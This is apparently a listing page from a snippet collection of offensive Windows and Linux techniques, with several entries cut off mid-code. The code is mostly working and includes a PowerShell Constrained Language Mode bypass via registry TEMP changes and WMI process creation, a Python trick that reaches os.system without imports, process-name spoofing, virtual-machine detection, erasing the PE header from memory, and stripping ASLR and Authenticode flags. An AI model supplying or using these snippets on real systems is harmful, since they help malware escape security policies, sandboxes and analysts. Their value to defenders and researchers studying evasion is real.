• Bypass CLM

    $CurrTemp = $env:temp
$CurrTmp = $env:tmp
$TEMPBypassPath = "C:\windows\temp"
$TMPBypassPath = "C:\windows\temp"

Set-ItemProperty -Path 'hkcu:\Environment' -Name Tmp -Value "$TEMPBypassPath"
Set-ItemProperty -Path 'hkcu:\Environment' -Name Temp -Value "$TMPBypassPath"

Invoke-WmiMethod -Class win32_process -Name create -ArgumentList "Powershell.exe"
sleep 5

#Set it back
Set-ItemProperty -Path 'hkcu:\Environment' -Name Tmp -Value $CurrTmp
Set-ItemProperty -Path 'hkcu:\Environment' -Name Temp -Value $Cur...
    @sorahed
    View code Copy code

  • Calling os.system Without import Statements

    #!/usr/bin/env python3

# Note: this is clearly bad practice and should not be used in real projects.
# It is not confirmed that this will work in the future

for module in object.__subclasses__():
  if "_wrap_close" in str(module):
    for method in module.__init__.__globals__.values():
      if "function system" in str(system := method):
        system("id")
    @astreuw
    View code Copy code

  • Changing Process Name by Modifying cmdline in Linux

    #!/usr/bin/env python3

import ctypes
from threading import get_ident

libc = ctypes.CDLL("libc.so.6")

libc.pthread_setname_np(
    ctypes.c_ulong(get_ident()),
    ctypes.c_char_p(b"process_name"))
    @astreuw
    View code Copy code

  • Check for Synthetic MSR

    // Reserved MSR Address Space, meaning all future processors will not implement MSRs in this range.
//
// Goes up to 0x400000FF
//
#define SYNTHETIC_MSR_RANGE_START 0x40000000

BOOLEAN CheckForSyntheticMSR() {

    __try {
        __readmsr(SYNTHETIC_MSR_RANGE_START);
    }
    __except(EXCEPTION_EXECUTE_HANDLER) {
        return FALSE;
    }

    // If by any chance __readmsr returns a value, and our handler does not gets executed, we are likely being virtualized
    return TRUE;
}
    @estr3llas
    View code Copy code

  • Erase PE Header in Memory

    #define PAGE_SIZE 0x1000
#define NtCurrentProcess() ((HANDLE)(LONG_PTR)-1)

#define STATUS_PROCEDURE_NOT_FOUND 0xC000007A
#define STATUS_INVALID_PAGE_PROTECTION 0xC0000045
#define STATUS_SECTION_PROTECTION 0xC000004E
#define STATUS_SUCCESS 0x00000000

typedef
NTSYSCALLAPI
NTSTATUS
(NTAPI* pNtProtectVirtualMemory) (
    _In_ HANDLE ProcessHandle,
    _Inout_ PVOID* BaseAddress,
    _Inout_ PSIZE_T RegionSize,
    _In_ ULONG NewProtect,
    _Out_ PULONG OldProtect
);

NTSTATUS EraseHeader() {

    // Retri...
    @estr3llas
    View code Copy code

  • Increase PE's SizeOfImage field

    void IncreaseSizeOfImage(PPEB peb) {
     const auto ldr_data = peb->LoaderData;
     const auto& [flink, blink] = ldr_data->InLoadOrderModuleList;

     // Retrieve the record of our PE from NTDLL's POV
     const auto pe = reinterpret_cast<peb::PLDR_DATA_TABLE_ENTRY>(flink->Flink);

     // Get the PE's SizeOfImage field
     auto pSize = &pe->SizeOfImage;

     // Increase it by an arbitrary number
     *pSize = static_cast<
         ULONG > (
             static_cast< INT_PTR > (pe->SizeOfImage + 0x1...
    @estr3llas
    View code Copy code

  • Removing ASLR & Authenticode from a given module

    bool TamperDllCharacteristics(DWORD_PTR moduleBase) {

    // retrieve the module's NT header
    const auto dos = reinterpret_cast<PIMAGE_DOS_HEADER>(moduleBase);
    const auto nt = reinterpret_cast<PIMAGE_NT_HEADERS>(moduleBase + dos->e_lfanew);

    // Access the DllCharacteristics and toggle the ASLR & Authenticode if set
    return nt->OptionalHeader.DllCharacteristics & (IMAGE_DLLCHARACTERISTICS_FORCE_INTEGRITY | IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE)
        ? (nt->OptionalHeader.DllCharacteristi...
    @estr3llas
    View code Copy code